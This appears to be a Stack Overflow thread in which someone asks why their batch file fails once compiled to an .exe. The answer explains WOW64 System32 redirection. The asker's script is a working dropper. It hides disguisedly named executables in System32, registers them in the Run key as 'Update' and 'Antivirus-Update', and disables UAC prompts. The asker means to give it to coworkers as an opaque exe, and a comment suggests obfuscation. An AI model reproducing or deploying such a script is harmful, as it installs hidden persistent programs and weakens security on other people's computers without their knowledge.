# Having troubles with batch files

Tags: batch-file, cmd, batch-processing

This issue is eating my brains of. I have a simple batch file which makes a directory in `%SYSTEMROOT%` only if it does not exist & copies certain files to that directory, adds the attribute `+S +R +H` to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!

My issue is that when I convert it to exe using `Quick Batch Convertor` as the moment it becomes an exe it starts giving `Access denied error` only when It gets to copy the files in `%SYSTEMROOT%` even though I am running it as administrator and the disabling UAC command, which is `C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f`  works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the `Quick Batch Converter` because I have converted many files using this converter an they worked flawless.

The code for my batch is here

```
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update"     /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\"  " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v     "Antivirus-Update " /t REG_SZ /d     "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\"  " /f 
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir         %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe"     "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S             %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe


C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD             HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v                     ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f  
exit
```

Any Suggestions?

Comment: Have you tried running the .exe file from an elevated cmd prompt?

Comment: There might be some ideas at https://www.google.com/#q=obfuscate+batch+file

Comment: @NatThulke I tried that, it is not working

Comment: Which  Windows architecture? 32-bit or 64-bit? Run `wmic OS get OSArchitecture` or even (to see all info)  `wmic OS get /value`

Comment: @JosefZ Sorry for late reply, it is x64 running Windows 10 Pro

Comment: note, that any exe converted from batch does not really execute as exe, but recreates a temporary batchfile to execute. So this is not a safe way to keep your code secret.

Comment: @Stephan Yes I know, But obfuscation may also not be the best way. They can be easily decrypted. But if it creates a a temp file than it should have run still the same like it did when I did not compile it in the exe

Comment: no experience with that. But try to use absolute paths (don't know, where the temp file will reside (probably in `%temp%`), so `%~dp0` surely is not reliable).

Comment: @Stephan I conducted a research. Before compiling I added a `echo %CD%` command in the batch. When I ran the batch it showed the current location. So I Think `%~dp0` is reliable.

Answer (score 0, accepted):

This answer does not resolve your problem; it's intended for explanation of strangely unusual behaviour of *compiled* script. 
Described issue is not solvable with this 32-bit [Quick Batch File Compiler](http://www.abyssmedia.com/quickbfc/). For proof, create a batch script `battoexeTest.bat` containing

```
@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value 
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause
```

Output (elevated; note that I have redirected user's `%temp%` and `%tmp%` variables):

```
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat" 
ExecutablePath=C:\Windows\System32\cmd.exe
```

If you run compiled version of above script `batToExeTestY.exe` **elevated**, output would change as follows:

```
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe
```

You can see that

- `batToExeTestY.exe` creates a copy of original batch script with some random name `8YQTO48H.bat` in temporary directory of account `SYSTEM`, see `CommandLine`;
- runs that batch file in `32bit` command line, see `ExecutablePath`.
- hence, 32-bitness proved.

Read [File System Redirector](https://msdn.microsoft.com/en-us/library/aa384187.aspx) chapter in MSDN article [Running 32-bit Applications](https://msdn.microsoft.com/en-us/library/aa384249(v=vs.85).aspx):

> The `%windir%\System32` directory is reserved for 64-bit applications.
>   … In most cases, whenever a 32-bit application attempts to access
>   `%windir%\System32`, the access is redirected to `%windir%\SysWOW64`…

Example: run `attrib` under *64-bit command line prompt* (`C:\Windows\system32\cmd.exe`) regardless of elevated or not:

```
==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A    R       C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A            C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt

==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A            C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A  SHR       C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt
```

If you run `attrib` or `dir` under *32-bit command line prompt*, then WOW redirector

- displays `C:\Windows\system32\SystemSettingsUpdate` file directory although
- shows files located in `%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate` one.

Take a look:

```
==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A    R       C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A            C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt

==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
 Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016  12:25    <DIR>          .
01.03.2016  12:25    <DIR>          ..
01.03.2015  12:31             5 120 WOW-cliParser.exe
26.02.2016  08:54                84 WOW-HL~Realtime~Defense.txt
```

Moreover, trying to run your batch script (slightly adapted for testing purposes and then compiled) elevated but *AVG Internet Security Ultimate* complains in its *Resident Shield*:

```
"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"
```

and on `copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"` line  and/or on `attrib` lines in its *Identity Protection* module:

```
"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""
```

Could be a false positive, but you definitely need to use some virus-free and **64-bit**-compliant bat to exe converter…

Comment: Good details, However You are wrong, I have compiled many Bats to exe, with all of them containing `copy` command to the `C:\Windows\system32\SystemSettingsUpdate`. They all worked magnificently with copying all files. I conducted another experiment whose results were Strange but True. What I did was I made the same bat file which copies a `log.txt` instead of other crap and add the `System Attribute` to it. I compiled it using the same compiler & I ran it.The results were positive; There was a directory with files inside it. Suggestions as to why it did not work on my original files?

Comment: @Mr.Helpy if I'm wrong, then where do you think came the `SystemSettingsUpdate` folder under `%SYSTEMROOT%\sysWOW64` from? Nothing else than `if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir "%SYSTEMROOT%\system32\SystemSettingsUpdate"` command _in your script version_ converted to exe and run elevated… Maybe you are using _Quick Batch Convertor_ other than that from http://www.abyssmedia.com/quickbfc/ link?

Comment: Yes I do but I use the paid version. I am thinking about that the problem is from my side I will try and change the `SystemSettingsUpdate` name with an additional `s` at the last and see what happens. I will update you as soon as I get home. Thanks

Comment: If you  use the paid version then ask them. Their support page says: "*Don't hesitate to contact us, we will reply to every email from our customers!*"

Comment: Sorry again for late reply, I am quite busy these days. One thing I have learned from your comment is that never ever seek help from them. They just make matters bad to worst. I decided I am a man of my own and Brilliantly, I changed the path of copying to the `%USERPROFILE%`! Lol, why be stubborn, right? That appears to have solved my issue. Thank you Josefz; I will choose the accepted answer and Please if my question was clear or showed research work then please upvote it . Regards